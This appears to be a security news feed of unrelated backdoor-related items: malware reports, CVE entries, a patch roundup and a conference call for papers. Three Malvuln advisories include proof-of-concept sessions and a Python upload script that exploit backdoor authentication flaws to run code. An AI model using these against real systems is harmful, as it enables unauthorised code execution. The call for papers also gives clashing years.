The call for papers for Hardwear.io NL 2022 is now open. It will take place October 27th through the 28th, 2021 in the Netherlands.

    *🐞 CFP for Hardwear.io NL 2022 is OPEN!*If you have groundbreaking embedded research or an awesome open-source toolyou’d like to showcase before the global hardware security community, thisis your chance. Send in your ideas on various hardware subjects, includingbut not limited to Chips, Processors, ICS/SCADA, Telecom, Protocols &Cryptography.CFP is open until: 15 August 2022Conference: 27-28 October 2022, The Hague (NL)✅ SUBMIT your research: https://hardwear.io/netherlands-2022/cfp.php➡️ Suggested Topics:Smart cards: identification, access controls, pay-TVIoT devices: automotive, medical, mobile payment, mobile-connected devicesTrusted computing: mobile TPM, Trusted Execution EnvironmentsEmbedded systems: Firmware, operating systems, memory, virtual machinesTrojans and backdoors: Counterfeit Detection and preventionAttacks and countermeasures:Side-channel, Fault Injection, EMFI, Tempest attacks and countermeasuresReverse engineering, (anti-)cloning, (anti-)tampering, (anti-)counterfeiting➡️ Questions? cfp@hardwear.ioWe look forward to seeing you at Hardwear.io NL 2022. Good luck!Team Hardwear.io <http://hardwear.io/>

Hardwear.io NL 2022 Call For Papers

A newly discovered malware has been put to use in the wild at least since March 2021 to backdoor Microsoft Exchange servers belonging to a wide range of entities worldwide, with infections lingering in 20 organizations as of June 2022.
Dubbed SessionManager, the malicious tool masquerades as a module for Internet Information Services (IIS), a web server software for Windows systems, after

A newly discovered malware has been put to use in the wild at least since March 2021 to backdoor Microsoft Exchange servers belonging to a wide range of entities worldwide, with infections lingering in 20 organizations as of June 2022.

Dubbed **SessionManager**, the malicious tool masquerades as a module for Internet Information Services (IIS), a web server software for Windows systems, after exploiting one of the ProxyLogon flaws within Exchange servers.

Targets included 24 distinct NGOs, government, military, and industrial organizations spanning Africa, South America, Asia, Europe, Russia and the Middle East. A total of 34 servers have been compromised by a SessionManager variant to date.

This is far from the first time the technique has been observed in real-world attacks. The use of a rogue IIS module as a means to distribute stealthy implants mirrors the tactics of a credential stealer called Owowa that came to light in December 2021.

"Dropping an IIS module as a backdoor enables threat actors to maintain persistent, update-resistant and relatively stealthy access to the IT infrastructure of a targeted organization; be it to collect emails, update further malicious access, or clandestinely manage compromised servers that can be leveraged as malicious infrastructure," Kaspersky researcher Pierre Delcher said.

The Russian cybersecurity firm attributed the intrusions with medium-to-high confidence to an adversary tracked as Gelsemium, citing overlaps in the malware samples linked to the two groups and victims targeted.

ProxyLogon, since its disclosure in March 2021, has attracted the repeated attention of several threat actors, and the latest attack chain is no exception, with the Gelsemium crew exploiting the flaws to drop SessionManager, a backdoor coded in C++ and is engineered to process HTTP requests sent to the server.

"Such malicious modules usually expect seemingly legitimate but specifically crafted HTTP requests from their operators, trigger actions based on the operators' hidden instructions if any, then transparently pass the request to the server for it to be processed just like any other request," Delcher explained.

Said to be a "lightweight persistent initial access backdoor," SessionManager comes with capabilities to read, write, and delete arbitrary files; execute binaries from the server; and establish communications with other endpoints in the network.

The malware further acts as a covert channel to conduct reconnaissance, gather in-memory passwords, and deliver additional tools such as Mimikatz as well as a memory dump utility from Avast.

The findings come as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) urged government agencies and private sector entities using the Exchange platform to switch from the legacy Basic Authentication method to Modern Authentication alternatives prior to its deprecation on October 1, 2022.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New 'SessionManager' Backdoor Targeting Microsoft IIS Servers in the Wild

Malicious ISS module exploitation is the latest trend among threat actors targeting Exchange servers, analysts say.

Attackers once focused on exploiting ProxyLogon Microsoft Exchange server vulnerabilities have made a pivot to the new SessionManager backdoor, which can be used to gain persistent, undetected access to emails -- and even take over the target organization's infrastructure. 

Researchers from Kaspersky today report the emergence of SessionManager, which they say is part of a bigger trend of attackers deploying malicious backdoor modules inside Internet Information Services (ISS) servers for Windows, like Exchange servers.   

The malicious SessionManager backdoor, first observed in March 2021, has been used to target nongovernmental organizations (NGOs) across Africa, Europe, the Middle East, and South Asia, the researchers add. The Kaspersky report says 34 servers across 24 individual NGOs have been compromised by SessionManager. 

"The exploitation of Exchange server vulnerabilities has been a favorite of cybercriminals looking to get into targeted infrastructure since Q1 2021," said Pierre Delcher, senior security researcher at Kaspersky, in a post about the findings. "The recently discovered SessionManager was poorly detected for a year and is still deployed in the wild."

The Kaspersky team recommends regular threat hunting for malicious modules in exposed ISS servers and focusing detection on lateral movement across the network, as well as close monitoring of data exfiltration to the Internet. 

"In the case of Exchange servers, we cannot stress it enough: The past year’s vulnerabilities have made them perfect targets, whatever the malicious intent, so they should be carefully audited and monitored for hidden implants, if they were not already,” Delcher warned.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Exchange Servers Backdoored Globally by SessionManager

Backdoor.Win32.Coredoor.10.a malware suffers from an authentication bypass vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/49da40a2ac819103da9dc5ed10d08ddb.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Coredoor.10.aVulnerability: Authentication BypassDescription: The malware runs an FTP server on TCP port 21000. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution.Family: CoredoorType: PE32MD5: 49da40a2ac819103da9dc5ed10d08ddbVuln ID: MVID-2022-0618Dropped files: CFS.EXE  Disclosure: 06/29/2022Exploit/PoC:C:\>nc64.exe 192.168.18.125 21000220 c400s FTP Server read...USER malvuln331 Password required for malvuln.PASS malvuln230 User malvuln logged in.SYST215 UNIX Type: L8 Internet Component SuitePASV227 Entering Passive Mode (192,168,18,125,194,224).STOR DOOM.exe150 Opening data connection for DOOM.exe.426 Connection closed; Cannot create file C:\temp\DOOM.exe.CWD \Users250 CWD command successful. "C:/Users/" is current directory.PASV227 Entering Passive Mode (192,168,18,125,195,94).STOR DOOM.exe150 Opening data connection for DOOM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=50014DOOM="DOOM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Coredoor.10.a MVID-2022-0618 Authentication Bypass

Backdoor.Win32.EvilGoat.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/20daf01e941f966b21a7ae431faefc65.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.EvilGoat.bVulnerability: Weak Hardcoded CredentialsDescription: The malware listens on TCP port 13014. Authentication is required, however the credentials "evilgoat / penix" are weak and found within the PE file.Family: EvilGoatType: PE32MD5: 20daf01e941f966b21a7ae431faefc65Vuln ID: MVID-2022-0619Dropped files: ftpsvr.exeDisclosure: 06/29/2022Exploit/PoC:telnet.exe x.x.x.x 13014220 FTP ServerUSER evilgoat331 Password required for evilgoat.PASS penix230 User evilgoat logged in.SYST500 'SYST': command not understood.PASV227 Entering Passive Mode (192,168,18,125,236,209)CDUP \250 CWD command successful.STOR DOOM.exe150 Opening BINARY mode data connection for file transfer.226 Upload Complete, 25602 bytes sent.from socket import *MALWARE_HOST="192.168.18.125"PORT=60625DOOM="DOOM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.EvilGoat.b MVID-2022-0619 Hardcoded Credential

Backdoor.Win32.Cafeini.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/a8fc1b3f7a605dc06a319bf0e14ca68b.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Cafeini.bVulnerability: Weak Hardcoded CredentialsDescription: The malware listens on TCP ports 51966 and 23. Authentication is required, however the password "mama" is weak and found within the PE file. Moreover, the FTP server running on non standard port 23 also uses same password. Trying to execute a program incorrectly you get reply like, "STATUS I can't run program", as it requires the full path to the file to execute.Family: CafeiniType: PE32MD5: a8fc1b3f7a605dc06a319bf0e14ca68bVuln ID: MVID-2022-0617Disclosure: 06/29/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 51966CAFEiNi 1.1Enter your password:mamaC:\Users\victim\Desktop>whoamiwhoamiSTATUS: unknown command "WHOAMI"C:\Users\victim\Desktop>exec c:\Windows\system32\calc.exeexec c:\Windows\system32\calc.exeSTATUS: program runnedC:\Users\victim\Desktop>Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Cafeini.b MVID-2022-0617 Hardcoded Credential

Immigration organisations are being targeted by the APT group Evilnum, using spear phishing to send malicious Word documents.
The post Immigration organisations targeted by APT group Evilnum appeared first on Malwarebytes Labs.

Organisations working in the immigration sector are advised to be on high alert for Advanced Persistent Threat (APT) attacks. Bleeping Computer reports that European organisations, specifically, are under threat from the Evilnum hacking group.

Evilnum, on the APT scene since 2018 at the earliest and perhaps most well known for targeting the financial sector, appears to have switched gears.

**In times of conflict**

The observed attacks seem to have sprung into life on or around the beginning of the invasion of Ukraine. This is quite worrying for several reasons:

*   Immigration organisations in Europe are still impacted by the fallout from COVID-19. Additionally, Government immigration services continue to be non-functional or afflicted with severe delays in processing. The UK, which set up a dedicated visa for Ukrainian refugees, has experienced processing delays for unrelated visas of up to 6 months as a result of this project. Being targeted with malware could impact crucial services still further, putting people at risk.
*   Huge amounts of sensitive data is passing to and from independent immigration organisations related to the invasion of Ukraine. Exfiltration of this data could put people both outside Ukraine and those still there at risk of significant harm.
*   Many volunteer organisations have sprung up to support efforts related to Ukraine. Many of these have little to no funding and are being run by random groups of immigration lawyers with minimal experience of cybersecurity issues. This is, unfortunately, an area of potential rich pickings for attackers.

**Important attack details**

The APT group targeted an Intergovernmental organisation (IGO), an entity created via treaty which involves two or more nations to work on issues of common interest. This attack, then, is at the highest level in terms of immigration related impact.

It begins, as so many attacks do, with a targeted email containing a rogue attachment. Opening the attached Word document fires up a message which claims that the document was created in a later version of Microsoft Word. It explains how to enable editing in order to view the supposed content, typically called “Compliance” but also “Complaint” or “Proof of ownership”, among others.

Heavily obfuscated JavaScript decrypts and deposits an encrypted binary and a malware loader (which loads up the binary), and creates a scheduled task to keep things constantly ticking over. File system artefacts created during execution are designed to imitate legitimate Windows binary names, to assist in detection avoidance.

The aim here is to create a backdoor on infected systems. Machine snapshots are taken and sent back to base via POST requests, with exfiltrated data in encrypted form.

**Cybersecurity, just from a different point of view**

Refugees from Ukraine are being assisted by multiple organisations that were set up after the initial invasion. Lawyers helping to run these groups may not be fully immersed in cybersecurity. However, they follow strict rules and regulations with regard to client data by default. As a result, they’re often doing security-centric things to keep client data secure without perhaps noticing the crossover.

For example: Most immigration lawyer/client interactions in the UK currently are remote, partly due to COVID-19 and partly because the UK’s visa system is now almost entirely online. As a result, pretty much everything involving sensitive documentation begins life in the form of an email. This sounds bad at first glance; however, this isn’t the case. Lawyers and clients aren’t emailing important documents in plaintext. Instead, they’re making use of encrypted documents, secure file uploads, and deleting data as and when required.

**Tips for immigration orgs**

If you’re a small organisation looking to help with visa or refugee processes for Ukrainians fleeing the invasion, here’s some of the things you can make a start on now to help keep things secure:

*   Ensure your website is HTTPs. Most sites I’ve seen in this realm use a combination of contact email and/or web form. You don’t want sensitive information intercepted because of insecure websites. As few people as possible should have admin access to the site, and anything related to publishing. Use as few extensions and plugins as possible. Paying for domain anonymity services is useful if required.
*   Consider using an alias for public facing email addresses. Additionally, lock down all email addresses with multifactor authentication (MFA). The same goes for backup/recovery emails tied to the main account(s).
*   If you have the choice of SMS codes or authentication apps/hardware based security keys for 2FA, choose the latter. SMS won’t work with no signal reception, and fraudsters may divert your SMS codes via SIM swapping.
*   Consider using a password manager for organization-specific passwords. If you need to share logins, use a management tool which allows you to share logins without revealing the password itself. Should you land on a phishing site, your password manager won’t pre-fill your details into the bogus portal.

I’ve spoken to individuals from several UK-based immigration organisations, including those focused on helping Ukrainians. At this point, none of them report having been targeted by attacks similar to the above. However, those organisations are absolutely in the spotlight for anyone potentially up to no good. If you’re in this line of work, or you’re just getting started, consider where and how you can begin to get things locked down right now.

Immigration organisations targeted by APT group Evilnum

Xiaongmai AHB7008T-MH-V2, AHB7804R-ELS, AHB7804R-MH-V2, AHB7808R-MS-V2, AHB7808R-MS, AHB7808T-MS-V2, AHB7804R-LMS, HI3518_50H10L_S39 V4.02.R11.7601.Nat.Onvif.20170420, V4.02.R11.Nat.Onvif.20160422, V4.02.R11.7601.Nat.Onvif.20170424, V4.02.R11.Nat.Onvif.20170327, V4.02.R11.Nat.Onvif.20161205, V4.02.R11.Nat.20170301, V4.02.R12.Nat.OnvifS.20170727 is affected by a backdoor in the macGuarder and dvrHelper binaries of DVR/NVR/IP camera firmware due to static root account credentials in the system.

master

Switch branches/tags

**1** branch **0** tags

Code

**Latest commit**

Snawoot update readme

82b0a92

Aug 9, 2020

update readme

82b0a92

**Git stats**

*   **4** commits

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

.gitignore

update gitignore

Feb 4, 2020

LICENSE

Initial commit

Feb 4, 2020

Makefile

upload

Feb 4, 2020

README.md

update readme

Aug 9, 2020

hs-dvr-telnet.c

upload

Feb 4, 2020

**README.md**

**hisilicon-dvr-telnet**

PoC materials for article https://habr.com/en/post/486856/

❤️ ❤️ ❤️

You can say thanks to the author by donations to these wallets:

*   ETH: 0xB71250010e8beC90C5f9ddF408251eBA9dD7320e
*   BTC:
    *   Legacy: 1N89PRvG1CSsUk9sxKwBwudN6TjTPQ1N8a
    *   Segwit: bc1qc0hcyxc000qf0ketv4r44ld7dlgmmu73rtlntw

CVE-2021-41506: GitHub - Snawoot/hisilicon-dvr-telnet: PoC materials for article https://habr.com/en/post/486856/

Plus: Google issues fixes for Android bugs, and Cisco, Citrix, SAP, WordPress, and more issue major patches for enterprise systems.

June has seen the release of multiple security updates, with important patches issued for the likes of Google's Chrome and Android as well as dozens of patches for Microsoft products, including fixes for a Windows zero-day vulnerability that attackers had already exploited. Apple updates were absent at the time of writing, but the month also included some major enterprise-focused patches for Citrix, SAP, and Cisco products.

Here’s what you need to know about the major patches released in the past month.

Microsoft

Microsoft’s Patch Tuesday release was pretty hefty in June, including fixes for 55 flaws in the tech giant’s products. This Patch Tuesday was particularly important because it addressed an already exploited remote code execution (RCE) issue in Windows dubbed Follina, which Microsoft has been aware of since at least May.

Tracked as CVE-2022-30190, Follina—which takes advantage of vulnerabilities in the Windows Support Diagnostic tool and can execute without the need to open a document—has already been used by multiple criminal groups and state-sponsored attackers.

Three of the vulnerabilities addressed in Patch Tuesday affecting Windows Server are RCE flaws and rated as critical. However, the patches seem to be breaking some VPN and RDP connections, so be careful.

Google Chrome

Google Chrome updates continue to come thick and fast. That’s no bad thing, as the world’s most popular browser is by default one of the biggest targets for hackers. In June, Google released Chrome 103 with patches for 14 vulnerabilities, some of which are serious.

Tracked as CVE-2022-2156, the biggest flaw is a use-after-free issue in Base reported by Google’s Project Zero bug-hunting team that could lead to arbitrary code execution, denial of service, or corruption of data. Worse, when chained with other vulnerabilities the flaw could lead to full system compromise.

Other issues patched in Chrome include vulnerabilities in Interest Groups, WebApp Provider, and a flaw in the V8 Javascript and WebAssembly engine.

Google Android

Of the multiple Android security issues Google patched in June, the most severe is a critical security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed, Google said in its Android Security Bulletin.

Google also released updates for its Pixel devices to patch issues in the Android Framework, Media Framework, and System Components.

Samsung users seem to have gotten lucky with Android updates of late, with the device maker rolling out its patches very quickly. The June security update is no different, reaching the Samsung Galaxy Tab S7 series, Galaxy S21 series, Galaxy S22 series, and the Galaxy Z Fold 2 straightaway.

Cisco

Software maker Cisco released a patch in June to fix a critical vulnerability in Cisco Secure Email and Web Manager and Cisco Email Security Appliance that could allow a remote attacker to bypass authentication and log in to the web management interface of an affected device.

The issue, tracked as CVE-2022-20798, could be exploited if an attacker enters something specific on the login page of the affected device, which would provide access to the web-based management interface, Cisco said.

Citrix

Citrix has issued a warning urging users to patch some major vulnerabilities that could let attackers reset admin passwords. The vulnerabilities in Citrix Application Delivery Management could result in corruption of the system by a remote, unauthenticated user, Citrix said in a security bulletin. “The impact of this can include the reset of the administrator password at the next device reboot, allowing an attacker with ssh access to connect with the default administrator credentials after the device has rebooted,” the company wrote.

Citrix recommends that traffic to the Citrix ADM’s IP address be segmented from standard network traffic. This diminishes the risk of exploitation, it said. However, the vendor also urged customers to install the updated versions of Citrix ADM server and Citrix ADM agent “as soon as possible.”

SAP

Software firm SAP has released 12 security patches as part of its June Patch Day, three of which are serious. The first listed by SAP relates to an update released on April 2018 Patch Day and applies to the browser control Google Chromium used by the firm’s business clients. Details of this vulnerability aren’t available, but it has a severity score of 10, so the patch should be applied straightaway.

Another major fix concerns an issue in the SAProuter proxy in NetWeaver and ABAP Platform, which could allow an attacker to execute SAProuter administration commands from a remote client. The third major patch fixes a privilege escalation bug in SAP PowerDesigner Proxy 16.7.

Splunk Enterprise

Splunk has released some out-of-band patches for its Enterprise product, fixing issues including a critical-rated vulnerability that could lead to arbitrary code execution.

Labeled CVE-2022-32158, the flaw could allow an adversary to compromise a Universal Forwarder endpoint and execute code on other endpoints connected to the deployment server. Thankfully, there’s no indication that the vulnerability has been used in any real-world attacks.

Ninja Forms WordPress Plug-In

Ninja Forms, a WordPress plug-in with over a million active installations, has patched a serious issue that’s probably being used by attackers in the wild. “We uncovered a code injection vulnerability that made it possible for unauthenticated attackers to call a limited number of methods in various Ninja Forms classes, including a method that unserialized user-supplied content, resulting in Object Injection,” security analysts at the WordPress Wordfence Threat Intelligence team said in an update.

This could allow attackers to execute arbitrary code or delete arbitrary files on sites where a separate POP chain was present, researchers said.

The flaw has been fully patched in versions 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, and 3.6.11. WordPress appears to have performed a forced automatic update for the plug-in, so your site may already be using one of the patched versions.

Atlassian

Australian software company Atlassian has released a patch to fix a zero-day flaw that’s already being exploited by attackers. Tracked as CVE-2022-26134, the RCE vulnerability in the Confluence Server and Data Center can be used to backdoor internet-exposed servers.

GitLab

GitLab has issued patches for versions 15.0.1, 14.10.4, and 14.9.5 for GitLab Community Edition and Enterprise Edition. The updates contain important security fixes for eight vulnerabilities, one of which could allow for account takeover.

With this in mind, the firm “strongly recommends” that all GitLab installations be upgraded to the latest version “as soon as possible.” GitLab.com is already running the patched version.

You Need to Update Windows and Chrome Right Now

Other applications using binary to extract untrusted archives are potentially vulnerable too

Other applications using binary to extract untrusted archives are potentially vulnerable too

A path traversal vulnerability in RarLab’s UnRAR binary can lead to remote code execution (RCE) on business email platform Zimbra and can potentially affect other software.

The UnRAR utility is used to extract RAR archives to a temporary directory for virus-scanning and spam-checking purposes.

However, a recently patched file-write flaw (CVE-2022-30333) means an unauthenticated attacker can “create files outside of the target extraction directory when an application or victim user extracts an untrusted archive”, according to a blog post published by Simon Scannell, vulnerability researcher at Swiss security firm Sonar (formerly SonarSource).

Catch up with the latest security research news

If malicious hackers manage to write to a known location, continued Scannell, they could potentially execute arbitrary commands on the system.

Successful exploitation of the high severity (CVSS 7.5) issue on Zimbra, an open source platform used by more than 200,000 businesses, “gives an attacker access to every single email sent and received on a compromised email server”.

They can also silently backdoor login functionalities and steal users’ credentials, as well as escalate access to an organization’s other internal services, warned Scannell.

**Symlink protection bypass**

The flaw resides in UnRAR’s mechanism for preventing symbolic link (symlink) attacks on Unix systems, whereby the function for validating relative symlinks, ,checks if the symlink target contains on Unix or on Windows.

This check can, however, be negated due to the fact that untrusted input is sometimes modified after it has been validated, which breaks assumptions made during the validation step.

Specifically, once the symlink has been validated, UnRAR converts backslashes (\\) to forward slashes (/) with to ensure that a RAR archive created on Windows can be extracted on a Unix system.

“By exploiting this behavior, an attacker can write a file anywhere on the target filesystem,” said Scannell.

**RCE on Zimbra**

Since the Amavis content filter used by Zimbra to analyze extracted files operates as the Zimbra user, added Scannell, the file-write primitive allows the creation and overwriting of files in other services’ working directories too.

The researcher detailed how an attacker could achieve RCE on Zimbra by writing a JSP shell to the web directory, using a file-based command injection, or creating an SSH key.

Sonar notified RarLab of the flaw on May 4, 2022, and a security patch was included with version 6.12 binaries, which were released on May 6.

Zimbr developer Synacor was also warned about the flaw on May 4 so it could warn users to patch their cloud instances.

A blog post detailing the technicalities was published yesterday (June 28).

Only Unix binaries – excluding Android – and implementations using RarLab’s code are affected.

Scannell thanked RarLab’s developers for “their very fast and professional handling of this issue”, and shouted out Zimbra’s security team for “warning their customers to help prevent exploitation”.

Zimbra is something of a specialty for Sonar, whose researchers have in the last 12 months discovered a bug chain leading to full Zimbra server compromise, an XSS flaw that powered spear phishing campaigns, and, only two weeks ago, a memcached injection vulnerability that imperilled login credentials.

RELATED Business email platform Zimbra patches memcached injection flaw that imperils user credentials

Tag

#backdoor